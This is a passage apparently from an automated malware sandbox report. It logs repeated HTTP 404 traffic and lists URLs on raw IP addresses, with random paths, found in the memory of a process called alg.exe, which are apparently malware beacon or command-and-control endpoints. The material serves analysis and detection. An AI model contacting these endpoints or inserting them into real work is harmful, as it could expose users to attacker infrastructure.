68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.27.2Date: Thu, 10 Oct 2024 08:08:47 GMTTransfer-Encoding: chunkedConnection: keep-aliveKeep-Alive: timeout=20Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Thu, 10 Oct 2024 08:08:51 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Thu, 10 Oct 2024 08:08:52 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Thu, 10 Oct 2024 08:08:58 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Thu, 10 Oct 2024 08:08:58 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Thu, 10 Oct 2024 08:09:11 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Thu, 10 Oct 2024 08:09:12 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: alg.exe, 00000009.00000003.3045551254.000000000059B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3060758556.000000000059C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3078569820.000000000059C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150/
                            Source: alg.exe, 00000009.00000003.2576145561.0000000000558000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2576692201.0000000000562000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2575063402.000000000055D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150/fymjdtcv
                            Source: alg.exe, 00000009.00000003.3100543352.00000000005A9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3119389154.00000000005A9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3110909006.00000000005A9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3135716796.00000000005A9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3156257212.00000000005A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150/mgsjgpoacwottwhx
                            Source: alg.exe, 00000009.00000003.3050069889.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3047643251.00000000005C9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3079434309.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3058249726.00000000005C9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3078569820.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3061259113.00000000005C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150/oknxycjjxcvmcygp
                            Source: alg.exe, 00000009.00000003.2665977163.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2682321054.000000000056E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150/sptkirsqxflbfd
                            Source: alg.exe, 00000009.00000003.2576145561.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2575063402.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2576692201.000000000056E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150:80/fymjdtcv
                            Source: alg.exe, 00000009.00000003.3120774885.000000000056E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150:80/mgsjgpoacwottwhxfP
                            Source: alg.exe, 00000009.00000003.2910224096.000000000056E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150:80/mhacrmsw
                            Source: alg.exe, 00000009.00000003.3048558345.000000000056E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150:80/oknxycjjxcvmcygP.ca
                            Source: alg.exe, 00000009.00000003.2926946186.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2910224096.000000000056E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150:80/rdoagulou
                            Source: alg.exe, 00000009.00000003.2665977163.000000000056E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150:80/sptkirsqxflbf
                            Source: alg.exe, 00000009.00000003.2937382799.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2926946186.000000000056E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150:80/uluonacniewnep
                            Source: alg.exe, 00000009.00000003.2725793461.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2690389382.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2718655052.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2744860394.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2756641044.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2725466664.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2739777279.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2709340960.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2682321054.000000000056E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150:80/vtkirsqxflbf
                            Source: alg.exe, 00000009.00000003.2937382799.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2744860394.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2811149563.000000000057A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2926946186.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2910224096.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2768613145.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2756206332.000000000057C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2946405217.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2745831053.000000000057A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://165.160.15.20/dkwdmdeuhpgaj%
                            Source: alg.exe, 00000009.00000003.2739777279.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2740295647.000000000057B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://165.160.15.20/libobglfegsxaj%
                            Source: alg.exe, 00000009.00000003.2744860394.000000000056E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://165.160.15.20:80/dkwdmdeuhpg
                            Source: alg.exe, 00000009.00000003.2768613145.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2744860394.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2756641044.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2739777279.000000000056E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://165.160.15.20:80/libobglfegsxaj
                            Source: alg.exe, 00000009.00000003.2613582337.000000000055A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2621081247.000000000055A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2621710164.0000000000562000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2614366913.0000000000562000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.143/dvejgi
